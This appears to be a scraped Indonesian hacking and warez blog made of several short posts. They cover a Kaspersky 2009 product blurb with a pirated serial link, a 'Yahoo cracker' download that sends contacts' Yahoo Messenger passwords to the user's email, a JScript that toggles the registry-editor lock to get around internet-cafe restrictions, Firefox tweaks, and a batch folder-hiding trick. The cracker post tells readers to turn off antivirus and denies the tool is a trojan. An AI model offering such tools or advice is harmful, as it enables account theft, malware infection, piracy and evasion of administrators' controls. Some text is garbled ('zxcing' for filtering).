Filed under: 1
Kaspersky Internet Security 2009 ? is a new line of Kaspersky Labs products, which is designed for the multi-tiered protection of personal computers. This product is based on in-house protection components, which are based on variety of technologies for maximum levels of user protection regardless of technical competencies. This product utilizes several technologies, which were jointly developed by Kaspersky Labs and other companies; part of them is implemented via online-services
During product preparation several competitor offerings were considered and analyzed – firewalls, security suites systems, which position themselves as proactive in defence and HIPS systems. Combination of in-hosue innovative developments and results from analysis gathered through the industry allowed to jump onto a new level of protection for personal users, whereby offering even more hardened and less annoying computer protection from all types of electronic threats ? malicious programs of different types, hacker attacks, spam mailings, program-root kits, phishing emails, advertisement popup windows etc
Product contains 6 main subsystems, and each of those includes basic protection components:
1) System watch. System watcher (all-in-one system for registering events).
- HIPS (host intrusion prevention system – proactive defense, which is based on limiting application actions on a system)
- PDM (system of proactive defense, which is based on application behavior analysis for malicious/suspicious activities)
- Firewall (personal protection screen)
2) Malware protection
- Protection of files and memory (File-Antivirus)
- Protection of email and IM (Mail-Antivirus)
- Protection of WEB (Web-Antivirus)
3) Online Security
- Protection from Phishing (Anti-Phishing)
- Protection against network attacks (IDS)
- Protection from auto-dialers (Anti-Dialer)
4) Content zxcing
- Spam zxcing (Anti-Spam)
- Banner zxcing (Anti-Banner)
- Parental Control
5) On Demand Scanning (Scan tasks)
6) Updater
First build supports only english localization and only full installation mode. This build does not support installing on top of current Kaspersky Labs products and also security products of other vendors (antivirus, firewalls, and security suites). The installation must be performed on a “clean OS” or remove potentially incompatible products manually. For product installation simply launch a distributive and follow on screen wizard prompts.
Activation code: TO-DO
Serial INCLUDED!
Code:
http://www.getupload.org/en/file/10098/NOD32-3-0-650-Smart-Security-And-Antivirus-Patches-rar-rar-html.html
Filed under: 1

cara menggunakannya:
1. download (selama proses download matikan AV)
2. nyalakan yahoo massengger
3. klik 2x program tersebut (akan kluar db seperti diatas)
4. tulis alamat e-mail kalian masing2 di kolom yg ada nick saya.
5. lalu klik DeCoder
setelah klik DeCoder password orang2 yg ada di list ym akan terkirim ke e-mail kita. (kalo mereka pake YM versi 8 keatas akan selamat dr program ini)
nb : matikan AV, karena sebagian AV memanggap program ini trojan tetapi yg jelas bukanlah trojan
Code:
http://rapidshare.com/files/121936602/Yahoo_cracker.exe.html
Filed under: 1
Kadang sebel kalo kadang ke warnet mau apa2in komputer di proteksi nah supaya bebas harus lewat regedit tapi regedit juga di proteksi. Nah cara buka regedit buka dolo notepad lalu copi coding di bawah ini :
[color=#0000FF]var vbCancel = 2;
var vbYesNoCancel = 3;
var vbYes = 6;
var vbNo = 7;
var vbQuestion = 32;
var vbInformation = 64;
var natan = WScript.CreateObject(“WScript.Shell”);
var pesan1 = “Pilihan Pengaman Regedit:\n\n”+
“[Yes] untuk Nonaktifkan Regedit.\n”+
“[No] untuk Aktifkan Regedit.\n”+
“[Cancel] untuk Keluar.\n\n”+
“[Bi4kKob4r]\n\n”+
“-> Nonaktifkan Regedit sekarang?”
var tanya = natan.popup(pesan1,0,”Pengaman Regedit”,vbYesNoCancel+
vbQuestion);
if (tanya == vbYes)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableRegistryTools”,1,”REG_DWORD”);
pesan2 = “Regedit Dinonaktifkan!”
natan.popup(pesan2,0,”Pengaman Regedit”,vbInformation);
}
else if (tanya == vbNo)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableRegistryTools”,0,”REG_DWORD”);
pesan3 = “Regedit Diaktifkan!”
natan.popup(pesan3,0,”Pengaman Regedit”,vbInformation);
}
else
{
natan.popup(“Terima Kasih.”,0,”Pengaman Regedit”,vbInformation);
}[/color]
setelah itu save dengan nama regedit.js ingat harus ber extensi js key. Nah lalu buka regedit.js setelah itu buka regedit lewat menu run atau ctrl+r ketik regeti dan taraaaaaaa…. regedit bisa dibuka
selamat mencoba
Filed under: 1
Langkah2nya:
1. Ketik, “about:config” di Addresse bar (URL) trus ENTER.
2. Cari en ganti settingannya kaya dibawah ini: (kalo belon ada, biQn dulu –> klik kanan – new – ….)
Quote:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 64
network.http.max-connections-per-server – 20
network.http.max-persistent-connections-per-proxy – 10
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
nglayout.initialpaint.delay = 0
network.http.request.max-start-delay = 0
If nglayout.initialpaint.delay doesnt exist, Right click, new integer.
network.http.max-persistent-connections-per-proxy = 10
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0
3. Tutup firefox lo, trus buka lagi
Filed under: 1
1. buat new folder [terserah namanya apa]
2. di dalam folder itu buat file txt yg berisi:
title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p “pass=>”
if NOT %pass%== PASSWORD HERE goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
3. ganti “PASSWORD HERE” dg passwordmu
4. simpan dg extensi .bat [contoh: rahasia.bat]
5. dobel klik file rahasia.bat, akan muncul folder “private”
6. simpan file2 rahasiamu disini [di dalam folder private]
7. setelah selesai, dobel klik file rahasia.bat, akan muncul kotak dialog
8. tekan “y” lalu enter
klo ingin memunculkan folder private tinggal klik file rahasia.bat lalu ketik passwordmu…